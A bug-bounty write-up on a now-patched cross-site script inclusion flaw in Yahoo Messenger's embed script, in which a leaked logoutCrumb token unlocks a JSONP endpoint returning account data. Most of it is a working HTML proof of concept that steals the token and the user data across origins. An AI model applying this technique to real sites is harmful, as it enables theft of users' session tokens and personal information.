While intercepting requests using Burp Suite I noticed the following request:

When I saw that this was a JSONP endpoint I immediately knew this could potentially be an XSSi (cross-site script inclusion) vulnerability. However, I noticed that if the value for the .crumb GET parameter wasn't valid it would return the following response:

At this point I realized that if I could somehow steal the victim's valid .crumb value, I could successfully steal information about their account. I then searched all requests I had intercepted in Burp Suite for my own valid crumb and quickly found it in a dynamic JavaScript file located at: https://messenger.yahoo.com/embed/app.js

If you go to this page now you will not find the logoutCrumb value since they have patched this issue. However, when I initially discovered this issue the file looked like this:

Now, for people that don't understand how XSSi works: the vulnerability takes advantage of the fact that the Same-Origin Policy (SOP) does not stop a page from loading a cross-origin script through the src attribute of a script tag. The browser sends the victim's cookies with that request and executes the response in the attacker's page, so any value the script assigns to a global or passes to a callback becomes readable by the including page. I then created the following Proof of Concept, which steals the valid .crumb value from the dynamic JavaScript file at https://messenger.yahoo.com/embed/app.js and then places the valid crumb in the .crumb GET parameter, as seen here: https://jsapi.login.yahoo.com/w/device_users?.crumb=POR1.kRjsx, which returns a proper response containing information about the user. Using the code below I was able to extract that information:

```html
<html>
<head>
  <title>Yahoo XSSi PoC</title>
</head>
<body>
  <div style="width: 60%; margin-right: auto; margin-left: auto; margin-bottom: 30px;">
    <h1 style="text-align: center;">Proof of Concept</h1>
    <b>Dataset 1:</b>
    <div id="content1" style="width: 100%; border: 1px solid black; padding: 10px; overflow: scroll; font-family: monospace;"></div>
    <br/>
    <b>Dataset 2:</b>
    <div id="content2" style="width: 100%; border: 1px solid black; padding: 10px; overflow: scroll; font-family: monospace;"></div>
  </div>

  <script>
    // JSONP callback invoked by the device_users response; renders the leaked data.
    function processDeviceUsers(data) {
      document.getElementById("content1").innerHTML = JSON.stringify(data);
    }

    // Runs once app.js (included below) has loaded and defined the global "iris" object.
    window.onload = function () {
      var config = {};
      var config_data = {};
      // app.js hands its session config to config.merge(); capture it here.
      config.merge = function (data) { config_data = data; };
      iris.initConfig(config);
      document.getElementById("content2").innerHTML = JSON.stringify(config_data);

      // Use the leaked logoutCrumb to build a valid device_users request and include it as a script.
      var src = "https://jsapi.login.yahoo.com/w/device_users?.crumb=" + config_data.session.logoutCrumb;
      var s = document.createElement('script');
      s.setAttribute('src', src);
      document.body.appendChild(s);
    }
  </script>

  <script src="https://messenger.yahoo.com/embed/app.js"></script>
  <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
</body>
</html>
```

Below is a screenshot of the payload I submitted to Yahoo, for which I received a $750 bug bounty. Overall, I had a great time developing the Proof of Concept for this vulnerability chain and I hope others are able to learn a thing or two from this write-up.